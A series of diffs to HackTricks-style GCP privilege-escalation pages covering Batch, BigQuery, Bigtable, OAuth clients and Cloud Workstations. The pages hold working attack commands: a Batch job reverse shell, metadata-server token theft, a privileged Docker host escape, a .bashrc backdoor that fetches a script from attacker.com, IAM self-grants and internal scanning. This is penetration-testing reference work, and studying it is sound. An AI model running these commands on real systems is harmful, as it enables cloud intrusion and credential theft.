-When a system or service installs the package using the virtual repository, it will download the malicious version from the public repository instead of the legitimate internal one, because the malicious version is higher and the remote repository has equal or higher priority.
+When a system or service installs the package using the virtual repository, the remote upstream can supply it when configured with equal or higher priority; if a client searches multiple indexes, `pip` may instead select the latest public version. This is the Dependency Confusion outcome described above.<sup>[[4]](#references)[[5]](#references)</sup>
+
+## References
+
+- [1] [Artifact Registry roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/artifactregistry)
+- [2] [Quickstart: Store Docker container images in Artifact Registry](https://cloud.google.com/artifact-registry/docs/docker/store-docker-container-images)
+- [3] [Manage images](https://cloud.google.com/artifact-registry/docs/docker/manage-images)
+- [4] [Manage Python packages](https://cloud.google.com/artifact-registry/docs/python/manage-packages)
+- [5] [Virtual repositories overview](https://cloud.google.com/artifact-registry/docs/repositories/virtual-overview)
+- [6] [Create virtual repositories](https://cloud.google.com/artifact-registry/docs/repositories/virtual-repo)
+- [7] [gcloud artifacts repositories delete](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/delete)
+- [8] [Using TestPyPI](https://packaging.python.org/en/latest/guides/using-testpypi/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Batch Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Batch
 
 Basic information:
@@ -12,7 +10,11 @@ Basic information:
 
 ### `batch.jobs.create`, `iam.serviceAccounts.actAs`
 
-It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default).
+With `batch.jobs.create` and `iam.serviceAccounts.actAs`, a principal can create a Batch job that runs code on a VM, obtain a reverse shell, and exfiltrate a short-lived access token for the attached service account. Google documents `batch.jobs.create` as the create permission and requires Service Account User on the job's service account (the Compute Engine default service account when no custom account is selected); that role includes `iam.serviceAccounts.actAs` for attaching service accounts.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+
+If `allocationPolicy.serviceAccount` is omitted, Batch-created VMs use the Compute Engine default service account. Code running on a VM configured with a service account can request a short-lived OAuth access token from the metadata server, so an interactive shell in the task can expose that service account's effective permissions.<sup>[[2]](#references)[[4]](#references)</sup>
+
+The example uses `gcloud beta batch jobs submit` with `--config -` and the Batch job JSON schema. The API's `name` field is output-only, so it is omitted from the request; the CLI job identifier and `--location` determine the submitted resource.<sup>[[5]](#references)[[6]](#references)</sup>
 
 <details>
 <summary>Create Batch job with reverse shell</summary>
@@ -20,7 +22,6 @@ It's possible to create a batch job, get a reverse shell and exfiltrate the meta
 ```bash
 gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
 {
-  "name": "projects/gcp-labs-35jfenjy/locations/us-central1/jobs/job-lxo3b2ub",
   "taskGroups": [
     {
       "taskCount": "1",
@@ -60,7 +61,20 @@ EOD
 
 </details>
 
+Replace the sample ngrok endpoint with a listener you control before testing; the job VM also needs outbound connectivity for the reverse shell. After the shell connects, request the attached service account's short-lived access token from the VM metadata server:<sup>[[4]](#references)</sup>
+
+```bash
+curl -s "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
+  -H "Metadata-Flavor: Google" | jq -r '.access_token'
+```
+
+## References
+
+- [1] [Batch roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/batch)
+- [2] [Control access for a job using a custom service account](https://docs.cloud.google.com/batch/docs/create-run-job-custom-service-account)
+- [3] [Requiring permission to attach service accounts to resources](https://docs.cloud.google.com/iam/docs/service-accounts-actas)
+- [4] [Authenticate workloads to Google Cloud APIs using service accounts](https://docs.cloud.google.com/compute/docs/access/authenticate-workloads)
+- [5] [gcloud beta batch jobs submit](https://docs.cloud.google.com/sdk/gcloud/reference/beta/batch/jobs/submit)
+- [6] [REST Resource: projects.locations.jobs](https://docs.cloud.google.com/batch/docs/reference/rest/v1/projects.locations.jobs)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
@@ -1,7 +1,5 @@
 # GCP - BigQuery Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## BigQuery
 
 For more information about BigQuery check:
@@ -12,7 +10,9 @@ For more information about BigQuery check:
 
 ### Read Table
 
-Reading the information stored inside the a BigQuery table it might be possible to find s**ensitive information**. To access the info the permission needed is **`bigquery.tables.get`** , **`bigquery.jobs.create`** and **`bigquery.tables.getData`**:
+Reading the information stored inside a BigQuery table might expose **sensitive information**.
+
+Reading table rows requires **`bigquery.tables.getData`**. A `bq query` invocation also creates a query job and therefore requires **`bigquery.jobs.create`** on the project; commands that retrieve table metadata may additionally require **`bigquery.tables.get`**.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 <details>
 <summary>Read BigQuery table data</summary>
@@ -26,8 +26,8 @@ bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT
 
 ### Export data
 
-This is another way to access the data. **Export it to a cloud storage bucket** and the **download the files** with the information.\
-To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**.
+This is another way to access the data. **Export it to a Cloud Storage bucket** and **download the files** with the information.\
+For an extract job writing to an existing bucket, the required permissions include **`bigquery.tables.export`**, **`bigquery.jobs.create`**, **`storage.objects.create`**, and **`storage.objects.delete`**.<sup>[[4]](#references)</sup>
 
 <details>
 <summary>Export BigQuery table to Cloud Storage</summary>
@@ -40,7 +40,7 @@ bq extract <dataset>.<table> "gs://<bucket>/table*.csv"
 
 ### Insert data
 
-It might be possible to **introduce certain trusted data** in a Bigquery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`** , **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**:
+It might be possible to **introduce certain trusted data** in a BigQuery table to abuse a **vulnerability in some other place**. A GoogleSQL `INSERT` query needs **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**, plus **`bigquery.tables.getData`** when the query reads table data. The streaming `bq insert` command uses the `tabledata.insertAll` API, which requires **`bigquery.tables.updateData`**, **`bigquery.tables.get`**, and **`bigquery.datasets.get`**.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[5]](#references)[[6]](#references)</sup>
 
 <details>
 <summary>Insert data into BigQuery table</summary>
@@ -57,32 +57,30 @@ bq insert dataset.table /tmp/mydata.json
 
 ### `bigquery.datasets.setIamPolicy`
 
-An attacker could abuse this privilege to **give himself further permissions** over a BigQuery dataset:
+An attacker could abuse this privilege to **give himself further permissions** over a BigQuery dataset. Dataset access is managed differently from table access: the current `bq` CLI does not support `add-iam-policy-binding` or `set-iam-policy` for datasets. Use a dataset DCL statement to grant a broad role such as `roles/bigquery.admin`; running the DCL query also requires **`bigquery.jobs.create`** on the project.<sup>[[2]](#references)[[3]](#references)[[5]](#references)[[9]](#references)</sup>
 
 <details>
 <summary>Set IAM policy on BigQuery dataset</summary>
 
 ```bash
-# For this you also need bigquery.tables.getIamPolicy
-bq add-iam-policy-binding \
-    --member='user:<email>' \
-    --role='roles/bigquery.admin' \
-    <proj>:<dataset>
+bq query --nouse_legacy_sql \
+    'GRANT `roles/bigquery.admin` ON SCHEMA `<proj>`.<dataset> TO "user:<email>"'
 
-# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
+# Alternatively, read and modify the dataset ACL, then overwrite it with
+# `bq update --source`; the complete workflow is shown below.
 ```
 
 </details>
 
 ### `bigquery.datasets.update`, (`bigquery.datasets.get`)
 
-Just this permission allows to **update your access over a BigQuery dataset by modifying the ACLs** that indicate who can access it:
+This permission allows an attacker to **update access to a BigQuery dataset by modifying its ACLs**. The `bq update --source` workflow reads the current ACL, applies local changes, and overwrites the existing access controls; with early enforcement enabled, ACL updates may also require **`bigquery.datasets.setIamPolicy`**.<sup>[[3]](#references)[[9]](#references)</sup>
 
 <details>
 <summary>Update BigQuery dataset ACLs</summary>
 
 ```bash
-# Download current permissions, reqires bigquery.datasets.get
+# Download current permissions; this requires bigquery.datasets.get
 bq show --format=prettyjson <proj>:<dataset> > acl.json
 ## Give permissions to the desired user
 bq update --source acl.json <proj>:<dataset>
@@ -94,27 +92,24 @@ bq head $PROJECT_ID:<dataset>.<table>
 
 ### `bigquery.tables.setIamPolicy`
 
-An attacker could abuse this privilege to **give himself further permissions** over a BigQuery table:
+An attacker could abuse this privilege to **give himself further permissions** over a BigQuery table. The `bq add-iam-policy-binding` command reads the current table policy and writes the added binding, so the caller needs both **`bigquery.tables.getIamPolicy`** and **`bigquery.tables.setIamPolicy`**.<sup>[[3]](#references)[[5]](#references)</sup>
 
 <details>
 <summary>Set IAM policy on BigQuery table</summary>
 
 ```bash
-# For this you also need bigquery.tables.setIamPolicy
 bq add-iam-policy-binding \
     --member='user:<email>' \
     --role='roles/bigquery.admin' \
+    --table=true \
     <proj>:<dataset>.<table>
-
-# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
 ```
 
 </details>
 
-### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`
+### `bigquery.rowAccessPolicies.create/update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`
 
-According to the docs, with the mention permissions it's possible to **update a row policy.**\
-However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.
+`CREATE OR REPLACE ROW ACCESS POLICY` can create a policy or replace one with the same name. Creating requires **`bigquery.rowAccessPolicies.create`**, **`bigquery.rowAccessPolicies.setIamPolicy`**, **`bigquery.tables.getData`**, and **`bigquery.jobs.create`**; updating an existing policy uses **`bigquery.rowAccessPolicies.update`** instead of `create`. A client or CLI flow that resolves table metadata may additionally need **`bigquery.tables.get`**.<sup>[[3]](#references)[[7]](#references)[[8]](#references)</sup>
 
 <details>
 <summary>Create or replace row access policy</summary>
@@ -125,13 +120,13 @@ bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON 
 
 </details>
 
-It's possible to find the filter ID in the output of the row policies enumeration. Example:
+The policy name and filter predicate can be found by listing the table's row access policies. Listing requires **`bigquery.rowAccessPolicies.list`**, while viewing policy members requires **`bigquery.rowAccessPolicies.getIamPolicy`**. Example:<sup>[[7]](#references)</sup>
 
 <details>
 <summary>List row access policies</summary>
 
 ```bash
- bq ls --row_access_policies <proj>:<dataset>.<table>
+bq ls --row_access_policies <proj>:<dataset>.<table>
 
       Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
  ------------- ------------------ ----------------------------- ----------------- --------------------
@@ -140,25 +135,35 @@ It's possible to find the filter ID in the output of the row policies enumeratio
 
 </details>
 
-If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:
+If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update`, you can remove the policy. Dropping a policy also requires **`bigquery.rowAccessPolicies.setIamPolicy`** and **`bigquery.jobs.create`**; dropping all policies additionally requires **`bigquery.rowAccessPolicies.list`**.<sup>[[7]](#references)</sup>
 
 <details>
 <summary>Delete row access policies</summary>
 
 ```bash
 # Remove one
-bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'
+bq query --nouse_legacy_sql 'DROP ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'
 
-# Remove all (if it's the last row policy you need to use this
+# Remove all (if it's the last row policy you need to use this)
 bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
 ```
 
 </details>
 
 > [!CAUTION]
-> Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery.
+> Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However, DML against a table protected by row access policies requires `TRUE` filter access, which grants access to all rows, so changing hidden rows is not a bypass without that broader access.<sup>[[10]](#references)</sup>
+
+## References
+
+- [1] [Managing table data | BigQuery](https://cloud.google.com/bigquery/docs/managing-table-data)
+- [2] [Running jobs programmatically | BigQuery](https://cloud.google.com/bigquery/docs/running-jobs)
+- [3] [Control access to resources with IAM | BigQuery](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam)
+- [4] [Export table data to Cloud Storage | BigQuery](https://cloud.google.com/bigquery/docs/exporting-data)
+- [5] [bq command-line tool reference | BigQuery](https://cloud.google.com/bigquery/docs/reference/bq-cli-reference)
+- [6] [Method: tabledata.insertAll | BigQuery](https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/insertAll)
+- [7] [Use row-level security | BigQuery](https://cloud.google.com/bigquery/docs/managing-row-level-security)
+- [8] [Data definition language (DDL) statements in GoogleSQL | BigQuery](https://cloud.google.com/bigquery/docs/reference/standard-sql/data-definition-language)
+- [9] [Changes to dataset-level access controls | BigQuery](https://cloud.google.com/bigquery/docs/dataset-access-control)
+- [10] [Using row-level security with other BigQuery features | BigQuery](https://cloud.google.com/bigquery/docs/using-row-level-security-with-features)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigtable-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigtable-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Bigtable Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Bigtable
 
 For more information about Bigtable check:
@@ -12,9 +10,11 @@ For more information about Bigtable check:
 
 ### `bigtable.instances.setIamPolicy`
 
-**Permissions:** `bigtable.instances.setIamPolicy` (and usually `bigtable.instances.getIamPolicy` to read the current bindings).
+**Permissions:** `bigtable.instances.setIamPolicy` (and usually `bigtable.instances.getIamPolicy` to read the current bindings).<sup>[[1]](#references)</sup>
 
-Owning the instance IAM policy lets you grant yourself **`roles/bigtable.admin`** (or any custom role) which cascades to every cluster, table, backup and authorized view in the instance.
+Owning the instance IAM policy lets you grant yourself **`roles/bigtable.admin`** (or a custom role containing the desired permissions); IAM policy inheritance then carries the binding to child clusters, tables, backups, and authorized views in the instance.<sup>[[1]](#references)[[2]](#references)</sup>
+
+The documented CLI form to add this binding is:<sup>[[3]](#references)</sup>
 
 <details><summary>Grant yourself bigtable.admin role on instance</summary>
 
@@ -27,15 +27,17 @@ gcloud bigtable instances add-iam-policy-binding <instance-id> \
 </details>
 
 > [!TIP]
-> If you cannot list the existing bindings, craft a fresh policy document and push it with `gcloud bigtable instances set-iam-policy` as long as you keep yourself on it.
+> If you cannot list the existing bindings, craft a fresh policy document and push it with `gcloud bigtable instances set-iam-policy` as long as you keep yourself on it. The command accepts a JSON or YAML policy file.<sup>[[10]](#references)</sup>
 
 After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
 
 ### `bigtable.tables.setIamPolicy`
 
-**Permissions:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).
+**Permissions:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).<sup>[[1]](#references)</sup>
 
-Instance policies can be locked down while individual tables are delegated. If you can edit the table IAM you can **promote yourself to owner of the target dataset** without touching other workloads.
+Instance policies can be locked down while individual tables are delegated. If you can edit the table IAM you can grant yourself Bigtable administration over the target table without touching other workloads.<sup>[[1]](#references)[[2]](#references)</sup>
+
+The documented CLI form to add this table-level binding is:<sup>[[4]](#references)</sup>
 
 <details><summary>Grant yourself bigtable.admin role on table</summary>
 
@@ -53,11 +55,13 @@ After having this permission check in the [**Bigtable Post Exploitation section*
 
 ### `bigtable.backups.setIamPolicy`
 
-**Permissions:** `bigtable.backups.setIamPolicy`
+**Permissions:** `bigtable.backups.setIamPolicy`<sup>[[1]](#references)</sup>
 
-Backups can be restored to **any instance in any project** you control. First, give your identity access to the backup, then restore it into a sandbox where you hold Admin/Owner roles.
+Backups can be restored to **any existing instance in any project** you control, subject to the destination's required permissions. First, give your identity access to the backup, then restore it into a sandbox where you hold Admin/Owner roles.<sup>[[6]](#references)</sup>
 
-If you have the permission `bigtable.backups.setIamPolicy` you could grant yourself the permission `bigtable.backups.restore` to restore old backups and try to access sensitiv information.
+If you have the permission `bigtable.backups.setIamPolicy`, bind yourself to a role containing `bigtable.backups.restore` (for example, `roles/bigtable.admin`) to restore old backups and try to access sensitive information.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
+
+The documented CLI form to add this backup-level binding is:<sup>[[5]](#references)</sup>
 
 <details><summary>Take ownership of backup snapshot</summary>
 
@@ -76,9 +80,11 @@ After having this permission check in the [**Bigtable Post Exploitation section*
 
 ### Update authorized view 
 
-**Permissions:** `bigtable.authorizedViews.update`
+**Permissions:** `bigtable.authorizedViews.update`<sup>[[1]](#references)[[2]](#references)</sup>
 
-Authorized Views are supposed to redact rows/columns. Modifying or deleting them **removes the fine-grained guardrails** that defenders rely on.
+Authorized Views expose a configured subset of table rows and columns, with access granted separately from the base table. An attacker who can update or delete one can **remove the fine-grained guardrails** that defenders rely on.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
+
+The update command and definition-file syntax, as well as the describe form used to discover a family name, are documented by Google Cloud. An empty row prefix includes all rows, and an empty qualifier prefix includes all columns in the named family.<sup>[[7]](#references)[[8]](#references)[[11]](#references)</sup>
 
 <details><summary>Update authorized view to broaden access</summary>
 
@@ -113,14 +119,17 @@ After having this permission check in the [**Bigtable Post Exploitation section*
 
 ### `bigtable.authorizedViews.setIamPolicy`
 
-**Permissions:**  `bigtable.authorizedViews.setIamPolicy`.
+**Permissions:**  `bigtable.authorizedViews.setIamPolicy`.<sup>[[1]](#references)[[2]](#references)</sup>
 
-An attacker with this permission can grant themselves access to an Authorized View, which may contain sensitive data that they would not otherwise have access to.
+An attacker with this permission can grant themselves a role containing `bigtable.authorizedViews.readRows` (such as `roles/bigtable.reader`) on an Authorized View, which may contain sensitive data that they would not otherwise have access to.<sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
+
+The documented CLI form to add this authorized-view binding is:<sup>[[9]](#references)</sup>
 
 <details><summary>Grant yourself access to authorized view</summary>
 
 ```bash
 # Give more permissions over an existing view
+# For row reads, use roles/bigtable.reader instead.
 gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
   --instance=<instance-id> --table=<table-id> \
   --member='user:<attacker@example.com>' \
@@ -130,6 +139,20 @@ gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
 </details>
 
 After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to read from an authorized view.
+
+## References
+
+- [1] [Bigtable access control with IAM](https://cloud.google.com/bigtable/docs/access-control)
+- [2] [Bigtable roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/bigtable)
+- [3] [gcloud bigtable instances add-iam-policy-binding](https://cloud.google.com/sdk/gcloud/reference/bigtable/instances/add-iam-policy-binding)
+- [4] [gcloud bigtable tables add-iam-policy-binding](https://cloud.google.com/sdk/gcloud/reference/bigtable/tables/add-iam-policy-binding)
+- [5] [gcloud bigtable backups add-iam-policy-binding](https://cloud.google.com/sdk/gcloud/reference/bigtable/backups/add-iam-policy-binding)
+- [6] [Bigtable backups overview](https://cloud.google.com/bigtable/docs/backups)
+- [7] [gcloud bigtable authorized-views update](https://cloud.google.com/sdk/gcloud/reference/bigtable/authorized-views/update)
+- [8] [Overview of authorized views](https://cloud.google.com/bigtable/docs/authorized-views)
+- [9] [gcloud bigtable authorized-views add-iam-policy-binding](https://cloud.google.com/sdk/gcloud/reference/bigtable/authorized-views/add-iam-policy-binding)
+- [10] [gcloud bigtable instances set-iam-policy](https://cloud.google.com/sdk/gcloud/reference/bigtable/instances/set-iam-policy)
+- [11] [gcloud bigtable authorized-views describe](https://cloud.google.com/sdk/gcloud/reference/bigtable/authorized-views/describe)
 
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigtable-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigtable-privesc.md
@@ -8,6 +8,8 @@ For more information about Bigtable check:
 ../gcp-services/gcp-bigtable-enum.md
 {{#endref}}
 
+After obtaining access, use the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) for data-access and backup-restoration techniques.
+
 ### `bigtable.instances.setIamPolicy`
 
 **Permissions:** `bigtable.instances.setIamPolicy` (and usually `bigtable.instances.getIamPolicy` to read the current bindings).<sup>[[1]](#references)</sup>
@@ -29,8 +31,6 @@ gcloud bigtable instances add-iam-policy-binding <instance-id> \
 > [!TIP]
 > If you cannot list the existing bindings, craft a fresh policy document and push it with `gcloud bigtable instances set-iam-policy` as long as you keep yourself on it. The command accepts a JSON or YAML policy file.<sup>[[10]](#references)</sup>
 
-After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
-
 ### `bigtable.tables.setIamPolicy`
 
 **Permissions:** `bigtable.tables.setIamPolicy` (optionally `bigtable.tables.getIamPolicy`).<sup>[[1]](#references)</sup>
@@ -49,9 +49,6 @@ gcloud bigtable tables add-iam-policy-binding <table-id> \
 ```
 
 </details>
-
-After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
-
 
 ### `bigtable.backups.setIamPolicy`
 
@@ -74,9 +71,6 @@ gcloud bigtable backups add-iam-policy-binding <backup-id> \
 ```
 
 </details>
-
-After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to restore a backup.
-
 
 ### Update authorized view 
 
@@ -115,8 +109,6 @@ gcloud bigtable authorized-views describe <view-id> \
 
 </details>
 
-After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to read from an authorized view.
-
 ### `bigtable.authorizedViews.setIamPolicy`
 
 **Permissions:**  `bigtable.authorizedViews.setIamPolicy`.<sup>[[1]](#references)[[2]](#references)</sup>
@@ -137,8 +129,6 @@ gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
 ```
 
 </details>
-
-After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to read from an authorized view.
 
 ## References
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
@@ -1,10 +1,8 @@
 # GCP - ClientAuthConfig Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ### Create OAuth Brand and Client
 
-[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions:
+[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions:<sup>[[1]](#references)</sup>
 
 - `clientauthconfig.brands.list`
 - `clientauthconfig.brands.create`
@@ -27,7 +25,10 @@ gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --displa
 
 </details>
 
-{{#include ../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [Programmatically creating OAuth clients for IAP | Google Cloud Documentation](https://cloud.google.com/iap/docs/programmatic-oauth-clients)
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -1,19 +1,19 @@
 # GCP - Cloud Workstations Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ### Container Breakout via Docker Socket (Container -> VM -> Project)
 
-The primary privilege escalation path in Cloud Workstations stems from the requirement to support **Docker-in-Docker (DinD)** workflows for developers. When the workstation configuration mounts the Docker socket or allows privileged containers (a common configuration), an attacker inside the workstation container can escape to the underlying Compute Engine VM and steal its service account token.
+Cloud Workstations base images configure and run Docker inside the workstation, so this is the main **Docker-in-Docker (DinD)** breakout pattern to investigate. The service places the workstation container on a Compute Engine VM; a configuration that exposes `/var/run/docker.sock` or otherwise grants privileged-container access (the documented default for code editors and applications) creates a container-to-VM escalation path. Docker documents that a socket bind gives a container control of the host daemon, and that a privileged container can obtain a root shell on the host. <sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
+
+After reaching the VM, an attacker can query its metadata server for the token issued to the attached service account. <sup>[[6]](#references)[[7]](#references)</sup>
 
 **Prerequisites:**
 - Access to a Cloud Workstation terminal (via SSH, compromised session, or stolen credentials)
 - The workstation configuration must mount `/var/run/docker.sock` or enable privileged containers
 
-**Architecture context:** The workstation is a container (Layer 3) running on a Docker/Containerd runtime (Layer 2) on a GCE VM (Layer 1). The Docker socket gives direct access to the host's container runtime.
+**Architecture context:** Treat the workstation as a container (Layer 3) on the host's container runtime (Layer 2), which runs on a GCE VM (Layer 1). Google documents the VM as living in the project VPC and the workstation container as running on that VM; an exposed Docker socket is the host-daemon control channel. <sup>[[1]](#references)[[4]](#references)</sup>
 
 > [!NOTE]
-> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the full container escape and drops you into a root shell on the host VM.
+> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the container breakout, mounts the host filesystem, and provides instructions for a root shell on the host VM. <sup>[[8]](#references)</sup>
 
 <details>
 
@@ -31,7 +31,7 @@ ls -l /var/run/docker.sock
 
 <summary>Step 2: Escape to the host VM filesystem</summary>
 
-We launch a privileged container, mounting the host's root directory to `/mnt/host`. We also share the host's network and PID namespace to maximize visibility.
+The following asks Docker for a privileged container, bind-mounts the host root at `/mnt/host`, and joins the host network and PID namespaces. Docker warns that privileged containers are not securely sandboxed and can obtain a host root shell. <sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 # Spawn a privileged container mounting the host's root filesystem
@@ -43,7 +43,7 @@ docker run -it --rm --privileged --net=host --pid=host \
 chroot /mnt/host /bin/bash
 ```
 
-You now have a **root shell on the underlying Compute Engine VM** (Layer 1).
+You now have a **root shell on the underlying Compute Engine VM** (Layer 1). <sup>[[4]](#references)</sup>
 
 </details>
 
@@ -67,17 +67,19 @@ curl -s -H "Metadata-Flavor: Google" \
 
 </details>
 
+The metadata server requires the `Metadata-Flavor: Google` header; its token endpoint returns an OAuth access token containing the scopes configured for the VM. <sup>[[6]](#references)[[7]](#references)</sup>
+
 > [!CAUTION]
 > **Check the Scopes!**
-> Even if the attached Service Account is **Editor**, the VM might be restricted by access scopes.
-> If you see `https://www.googleapis.com/auth/cloud-platform`, you have full access.
-> If you only see `logging.write` and `monitoring.write`, you are limited to the **Network Pivot** and **Persistence** vectors below.
+> Even if the attached Service Account has a broad role such as **Editor**, VM access scopes can further restrict OAuth API calls.
+> `https://www.googleapis.com/auth/cloud-platform` is the broad OAuth scope, but IAM roles still bound the token's effective permissions.
+> If you only see `logging.write` and `monitoring.write`, API use is constrained to those write scopes; the **Network Pivot** and **Persistence** vectors below do not depend on broad API scopes. <sup>[[7]](#references)</sup>
 
 <details>
 
 <summary>Step 4: Achieve Persistence (Backdoor the User)</summary>
 
-Cloud Workstations mount a persistent disk to `/home/user`. Because the container user (usually `user`, UID 1000) matches the host user (UID 1000), you can write to the host's home directory. This allows you to backdoor the environment even if the workstation container is rebuilt.
+When configured with persistent home storage, Cloud Workstations attach a persistent disk to `/home` at runtime, and the base images create the default `user` account. Check ownership and write permissions instead of assuming a UID mapping; if the host-mounted `/home/user` is writable, a profile change can survive workstation container recreation because the disk persists. <sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 # Check if you can write to the host's persistent home
@@ -94,7 +96,7 @@ echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc
 
 <summary>Step 5: Network Pivot (Internal VPC Access)</summary>
 
-Since you share the host network namespace (`--net=host`), you are now a trusted node on the VPC. You can scan for internal services that allow access based on IP whitelisting.
+With `--net=host`, Docker puts the breakout container in the host's network namespace, so it inherits the VM's VPC reachability (still subject to routes and firewall rules). Investigate internal services that trust the VM's source IP. <sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 # Install scanning tools on the host (if internet access allows)
@@ -105,6 +107,17 @@ nmap -sS -p 80,443,22 10.0.0.0/8
 ```
 
 </details>
+
+## References
+
+- [1] [Cloud Workstations architecture](https://docs.cloud.google.com/workstations/docs/architecture)
+- [2] [Customize container images](https://docs.cloud.google.com/workstations/docs/customize-container-images)
+- [3] [Set up security best practices](https://docs.cloud.google.com/workstations/docs/set-up-security-best-practices)
+- [4] [docker container run reference](https://docs.docker.com/reference/cli/docker/container/run/)
+- [5] [Host network driver](https://docs.docker.com/engine/network/drivers/host/)
+- [6] [View and query VM metadata](https://docs.cloud.google.com/compute/docs/metadata/querying-metadata)
+- [7] [Service accounts](https://docs.cloud.google.com/compute/docs/access/service-accounts)
